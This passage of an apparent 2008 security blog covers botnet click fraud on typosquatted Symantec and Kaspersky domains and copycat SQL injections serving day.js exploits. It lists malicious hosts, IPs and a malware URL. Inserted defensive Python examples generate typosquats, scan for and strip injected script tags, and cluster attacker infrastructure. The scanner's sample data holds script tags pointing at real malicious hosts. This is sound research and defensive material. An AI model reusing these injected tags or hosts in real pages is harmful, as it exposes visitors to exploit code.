What's coming out of Storm Worm's botnet isn't necessarily coming from the hardcore Storm Worm-ers, whose job today is more campaign-rotation related in order to ensure new bots are added; what's coming out of Storm Worm is coming from those using the access they've purchased to a part of the botnet.



Related posts:

Storm Worm Hosting Pharmaceutical Scams

All You Need is Storm Worm's Love

Social Engineering and Malware

Storm Worm Switching Propagation Vectors

Storm Worm's use of Dropped Domains

Offensive Storm Worm Obfuscation

Storm Worm's Fast Flux Networks

Storm Worm's St. Valentine Campaign

Storm Worm's DDoS Attitude

Riders on the Storm Worm

The Storm Worm Malware Back in the Game

Click Fraud, Botnets and Parked Domains - All Inclusive

July 28, 2008
It gets very ugly when someone owns both the botnet and the portfolio of parked domains actively participating in PPC (pay per click) advertising programs, where the junk content, or the typosquatted domain names, aim to attract high value and expensive keywords in order for the scammer to earn a higher per-click rate. This is among the very latest tactics applied by those engaging in click fraud. Hypothetically, the cost to rent the botnet and commit click fraud would be cheaper than sharing revenue on a per-click basis with "human clickers", who earn money based on how many ads they click on a set of scammer-owned sites, and where the customer support consists of a DIY proxy switching application changing their IP on the fly.



Click Forensics' recent Q2 2008 report indicates that botnets were responsible for over 25% of all click fraud activity they were monitoring during Q2. Not surprising, given that botnets have long been observed to commit click fraud using a common traffic exchange scheme. What's new is the use and abuse of parked domains :



"Despite indication that some of the clicks from parked domains were invalid, Google failed to disclose to the plaintiff specific domain names in which these ads were clicked on, making detection of invalid clicks difficult and even worse concealing any evidence of invalid clicks," the lawsuit alleges. RK West eventually went through its server logs and discovered the source of the clicks, said Alfredo Torrijos, one of the company's attorneys."



Cybersquatting security vendors in order to improve the chances of attracting high-valued keywords, to later on commit click fraud on the parked domains now showing relevant security ads, is nothing new. The trend has been pretty evident for a while, with cybersquatting increasing on a yearly basis according to multiple sources :



"Rise in pay-per-click advertising where cybersquatters link the domain name they have registered with a website containing ads promoting a variety of competing brands.  The cybersquatter receives money every time internet users access this website and click on one of the ads."



However, the "internet users who are supposed to click on one of the ads on the parked domains owned by the scammers" will get clicked by a botnet owned or cost-effectively rented by the scammer. Here's a sample of currently parked domains attracting Symantec ads :



symentec .com

symantek .com

symanteck .com

symantac .com

symantaec .com

symantic .com

symmantec .com

symanntec .com

ssymantec .com

symanthec .com

symanzec .com

symanttec .com

sjmantec .com

saimantec .com

seymantec .com

symanrec .com

symantrc .com

symantwc .com

aymantec .com

dymantec .com

sxmantec .com

symantex .com

symantev .com

symabtec .com

symamtec .com

synantec .com

stmantec .com

symanyec .com

sumantec .com

symant3c .com

syman5ec .com

wwwsymantec .com

symanteccom .com

ymantec .com

syantec .com

symntec .com

symanec .com

symantc .com

symante .com

symattec .com

symantcc .com

syman-tec .com

syymantec .com

symaantec .com

symanteec .com

symantecc .com

ysmantec .com

syamntec .com

symnatec .com

symatnec .com

symanetc .com

symantce .com




As well as a recent sample brandjacking Kaspersky :

kespersky .com

kasparsky .com

kaspaersky .com

kaspasky .com

kasperscky .com

gaspersky .com

kasbersky .com

kasppersky .com

kasperrsky .com

kasperssky .com

kasperskj .com

kasperskey .com

kaapersky .com

kasperaky .com

kasperdky .com

laspersky .com

kaspersly .com

kasperskt .com

kaspersku .com

kasp3rsky .com

kaspe4sky .com

kas0ersky .com

wwwkasperskycom .com

wwwkaspersky .com

kasperskycom .com

aspersky .com

kspersky .com

kasersky .com

kaspesky .com   

kaspersy .com

kaspersk .com

kappersky .com

kaspessky .com

kas-persky .com

kasp-ersky .com

kasper-sky .com

kasperskyy .com

akspersky .com

ksapersky .com

kapsersky .com

kaseprsky .com

kaspesrky .com   

kaspersyk .com

kaspersky24 .com

kasperskyonline .com

kaspersky-online .com




What's most disturbing is that instead of having cybersquatting taken care of a long time ago, so that scammers would need to rely on the junk content in order to attract the relevant ads on the bogus domains, cybersquatting still does the magic by including the targeted word in the domain name itself, so that no junk content generation courtesy of a blackhat SEO tool is needed.
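The two lists above fall into a handful of mechanical mutation classes: a dropped letter (ymantec), a doubled one (ssymantec), two adjacent letters swapped (symnatec), one letter replaced by a neighbouring key or look-alike digit (symant3c), a hyphen inserted (syman-tec), the www prefix glued on (wwwsymantec) and the TLD folded into the name (symanteccom). The following is an added example, not anything from the original post, of generating that single-edit candidate set for a brand and classifying observed domains against it; domains are written with the page's defanging space, and the classification names are my own.

```python
"""Generate single-edit typosquats of a brand and classify observed domains.
Added example; the mutation classes are inferred from the lists above."""
import string

ALPHABET = string.ascii_lowercase + string.digits


def _defang(domain):
    """'symentec .com' on the page is written with a space; normalise it."""
    return domain.replace(" ", "").strip().lower()


def typosquats(brand, tld="com"):
    """Return {candidate: mutation} for every one-edit variant of brand."""
    brand = brand.lower()
    out = {}

    def add(name, kind):
        if name != brand:
            out.setdefault(f"{name}.{tld}", kind)

    for i, ch in enumerate(brand):
        add(brand[:i] + brand[i + 1:], "omission")                  # ymantec
        add(brand[:i] + ch + brand[i:], "doubling")                 # ssymantec
        for c in ALPHABET:
            if c != ch:
                add(brand[:i] + c + brand[i + 1:], "substitution")  # symant3c
    for i in range(len(brand) - 1):
        add(brand[:i] + brand[i + 1] + brand[i] + brand[i + 2:], "transposition")  # symnatec
    for i in range(1, len(brand)):
        add(brand[:i] + "-" + brand[i:], "hyphenation")             # syman-tec
    add("www" + brand, "www-prefix")                                # wwwsymantec
    add(brand + tld, "tld-suffix")                                  # symanteccom
    return out


def classify(domain, brand, tld="com"):
    """Name the single edit that turns brand into domain, or 'unclassified'
    (multi-edit and keyword brandjacks such as kaspersky24 fall here)."""
    return typosquats(brand, tld).get(_defang(domain), "unclassified")


def triage(domains, brand, tld="com"):
    """Group a list of observed domains by mutation type."""
    groups = {}
    for d in domains:
        groups.setdefault(classify(d, brand, tld), []).append(_defang(d))
    return groups


if __name__ == "__main__":
    sample = ["symnatec .com", "ssymantec .com", "symant3c .com", "syman-tec .com",
              "wwwsymantec .com", "symanteccom .com", "ymantec .com"]
    for kind, names in sorted(triage(sample, "symantec").items()):
        print(f"{kind:14} {', '.join(names)}")
```

Substitution is generated for every letter and digit rather than only keyboard neighbours, which keeps the candidate set small enough to pre-register or watch (a few hundred per brand) while still catching the 3-for-e and 5-for-t look-alikes in the lists. Two-edit names and keyword additions like kaspersky-online are deliberately left unclassified: those are brandjacking, not fat-finger typos, and need a different (substring) check.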



Related posts:

Cybersquatting Security Vendors for Fraudulent Purposes

Cybersquatting Symantec's Norton AntiVirus

The State of Typosquatting - 2007

Smells Like a Copycat SQL Injection In the Wild

July 28, 2008
In between the massive SQL injections, which as a matter of fact remain ongoing, copycats taking advantage of the very same SQL injection tools using public search engines' indexes as a reconnaissance tool are also starting to take advantage of localized and targeted attacks, attacking specific online communities. Among these is mx.content-type.cn /day.js, using day.js to attempt multiple exploitation using publicly obtainable exploits such as Adodb.Stream, MPS.StormPlayer, DPClient.Vod, IERPCtl.IERPCtl.1 and GLIEDown.IEDown.1, and targeting primarily Chinese web communities.
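What these injections leave behind on a compromised site is a script tag pointing at one of the day.js hosts listed further down, appended to whatever text columns the tool could reach. As an added example (not from the original post) of how a site owner would confirm and clean such an infection, the following scans every string cell of every table in an SQLite copy of the database for injected script tags, reports the referenced host, and strips the tags; the tables and rows are constructed for the example, while the hostnames come from this post's lists.

```python
"""Find (and strip) <script src=...day.js> tags injected into text columns,
as a site owner would after one of these mass SQL injections.  Added example
on an in-memory SQLite copy with constructed rows; the hostnames come from
the lists in this post."""
import re
import sqlite3

# Matches an injected <script src="http://host/...">...</script> and captures host
INJECTED_SCRIPT = re.compile(
    r"""<script\b[^>]*\bsrc\s*=\s*["']?(?:https?:)?//([^/"'\s>]+)[^>]*>\s*</script\s*>""",
    re.IGNORECASE,
)


def _q(ident):
    """Quote an SQLite identifier (table / column name)."""
    return '"' + ident.replace('"', '""') + '"'


def text_columns(conn, table):
    return [row[1] for row in conn.execute(f"PRAGMA table_info({_q(table)})")]


def find_injected_scripts(conn):
    """Scan every string cell of every table; return (table, column, rowid, host)."""
    hits = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'")]
    for table in tables:
        cols = text_columns(conn, table)
        sql = f"SELECT rowid, {', '.join(_q(c) for c in cols)} FROM {_q(table)}"
        for rowid, *values in conn.execute(sql):
            for col, value in zip(cols, values):
                if isinstance(value, str):
                    for m in INJECTED_SCRIPT.finditer(value):
                        hits.append((table, col, rowid, m.group(1).lower()))
    return hits


def strip_injected_scripts(conn):
    """Remove the injected tags in place; returns the number of cells changed."""
    changed = 0
    seen = set()
    for table, col, rowid, _ in find_injected_scripts(conn):
        if (table, col, rowid) in seen:
            continue
        seen.add((table, col, rowid))
        (value,) = conn.execute(
            f"SELECT {_q(col)} FROM {_q(table)} WHERE rowid = ?", (rowid,)).fetchone()
        conn.execute(f"UPDATE {_q(table)} SET {_q(col)} = ? WHERE rowid = ?",
                     (INJECTED_SCRIPT.sub("", value), rowid))
        changed += 1
    conn.commit()
    return changed


def sample_db():
    """Constructed site database with two injected cells."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(name TEXT, description TEXT, price REAL);
        CREATE TABLE news(title TEXT, body TEXT);
    """)
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", [
        ("Widget", "A fine widget", 9.99),
        ("Gadget", "A gadget<script src=http://mx.content-type.cn/day.js></script>", 19.99),
    ])
    conn.executemany("INSERT INTO news VALUES (?, ?)", [
        ("Hello", 'First post<script src="http://ad.5iyy.info/day.js"></script>'),
        ("Clean", "Nothing to see here"),
    ])
    conn.commit()
    return conn


if __name__ == "__main__":
    db = sample_db()
    for hit in find_injected_scripts(db):
        print("injected:", hit)
    print("cells cleaned:", strip_injected_scripts(db))
```

Cleaning the rows is the smaller half of the job: the injection got in through a query that concatenated user input, and unless that query is parameterized the tool's next pass will put the tag straight back.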



Compared to the somewhat more sophisticated attack tactics applied by Chinese hackers taking advantage of localized versions of the de facto web malware exploitation kits, those who don't have access to such continue using cybercrime 1.0 DIY exploit embedding tools at large. The rest of the SQL injected domains, as well as the exploits themselves, are parked on the same place - 222.216.28.25, also responding to :



down.goodnetads .org

ads.goodnetads .org

real.kav2008 .com

hk.www404 .cn

err.www404 .cn

mx.content-type .cn

sun.63afe561 .info

ads.633f94d3 .info

ads.1234214 .info

ad.50db34d5 .info

ads.50db34d5 .info

ad.8d77b42a .info

web.adsidc .info

free.idcads .info

free.cjads .info

ads.adslooks .info

list.adslooks .info

ad.5iyy .info




The SQL injected domains :

ads.633f94d3.info/day .js

ad.8d77b42a.info/day .js

ad.5iyy.info/day .js

free.idcads.info/day .js

efreesky.com/day .js

v.freefl.info/day .js




The internal structure :

free.idcads.info/f/index .htm

free.idcads.info/014 .htm

free.idcads.info/real11 .htm

free.idcads.info/real10 .htm

free.idcads.info/lz .htm

free.idcads.info/bf .htm

free.idcads.info/kong .htm

free.idcads.info/f/swfobject .js

ad.50db34d5.info//rm%5C/rm .exe




Parked domains responding to the command and control locations, 60.191.223.76 and 222.216.28.100 :

ftp.gggjjj .info

live.ads002 .net

log.goodnetads .org

dat.goodnetads .org

root.51113 .com

sun.update999 .cn

abb.633f94d3 .info

up.50db34d5 .info


web.cn3721 .org   

cs.rm510 .com

sb.sb941 .com

k.sb941 .com

info.sb941 .com

day.sb941 .com

post.ad9178 .com

v.91tg .net




Centralizing their scammy ecosystem always makes it easier to monitor, keep track of, and of course, expose.
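The "centralization" that exposes them, here and in the Storm Worm campaign above, is the same pivot: domains sharing a nameserver (the ten news domains on BRPRBGOK6.COM) or a hosting IP (everything answering on 222.216.28.25) belong to one operation even when their names have nothing in common. The following is an added example, not part of either post, of turning a pile of (domain, record type, value) observations into infrastructure clusters with a union-find over shared values; the records are constructed from the lists in these two posts plus one unrelated control domain, nothing is resolved live, and giving each Storm domain the same two nameservers is an assumption for the sample.

```python
"""Cluster domains by shared nameservers / hosting IPs (added example).
Records are constructed from the lists in this post and the Storm post above;
nothing is resolved live."""
from collections import defaultdict

STORM_NS = ["ns.brprbgok6.com", "ns2.brprbgok6.com"]  # assumed for every Storm domain
STORM_DOMAINS = ["wapdailynews.com", "smartnewsradio.com", "bestvaluenews.com",
                 "toplessnewsradio.com", "companynewsnetwork.com", "goodnewsgames.com",
                 "marketgoodnews.com", "fednewsworld.com", "toplessdailynews.com",
                 "stocklownews.com"]
COPYCAT_DOMAINS = ["down.goodnetads.org", "ads.goodnetads.org", "real.kav2008.com",
                   "hk.www404.cn", "mx.content-type.cn", "ad.5iyy.info"]

# (domain, record type, value); constructed sample data
RECORDS = [(d, "NS", ns) for d in STORM_DOMAINS for ns in STORM_NS]
RECORDS += [(d, "A", "222.216.28.25") for d in COPYCAT_DOMAINS]
RECORDS += [("ftp.gggjjj.info", "A", "60.191.223.76"),
            ("live.ads002.net", "A", "60.191.223.76"),
            ("example.net", "A", "203.0.113.9")]  # unrelated control


def cluster_by_infrastructure(records):
    """Union domains that share any (type, value) pivot; return clusters
    sorted largest first, each with the pivots that tie it together."""
    parent = {}

    def find(x):
        parent.setdefault(x, x)
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    def union(a, b):
        ra, rb = find(a), find(b)
        if ra != rb:
            parent[ra] = rb

    pivots = defaultdict(set)  # (type, value) -> domains observed with it
    for domain, rtype, value in records:
        pivots[(rtype.upper(), value.lower())].add(domain.lower())
    for domains in pivots.values():
        first, *rest = sorted(domains)
        for d in rest:
            union(first, d)

    clusters = defaultdict(lambda: {"domains": set(), "pivots": set()})
    for key, domains in pivots.items():
        root = find(next(iter(domains)))
        clusters[root]["domains"].update(domains)
        if len(domains) > 1:  # a value seen once is not a pivot
            clusters[root]["pivots"].add(key)
    result = [{"domains": sorted(c["domains"]), "pivots": sorted(c["pivots"])}
              for c in clusters.values()]
    return sorted(result, key=lambda c: (-len(c["domains"]), c["domains"][0]))


def cluster_of(domain, records):
    """The cluster containing domain, or None if it was never seen."""
    for c in cluster_by_infrastructure(records):
        if domain.lower() in c["domains"]:
            return c
    return None


if __name__ == "__main__":
    for c in cluster_by_infrastructure(RECORDS):
        print(len(c["domains"]), "domains via", c["pivots"] or "nothing shared")
```

On real passive-DNS data the one caveat is shared hosting and registrar parking: a pivot like a big shared-hosting IP or a registrar's default nameservers ties thousands of innocent domains together, so in practice you weight or drop pivots above some popularity threshold before trusting a cluster.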



Related posts:

SQL Injecting Malicious Doorways to Serve Malware

Yet Another Massive SQL Injection Spotted in the Wild

Malware Domains Used in the SQL Injection Attacks

SQL Injection Through Search Engines Reconnaissance

Google Hacking for Vulnerabilities

Fast-Fluxing SQL injection attacks executed from the Asprox botnet

Sony PlayStation's site SQL injected, redirecting to rogue security software

Redmond Magazine Successfully SQL Injected by Chinese Hacktivists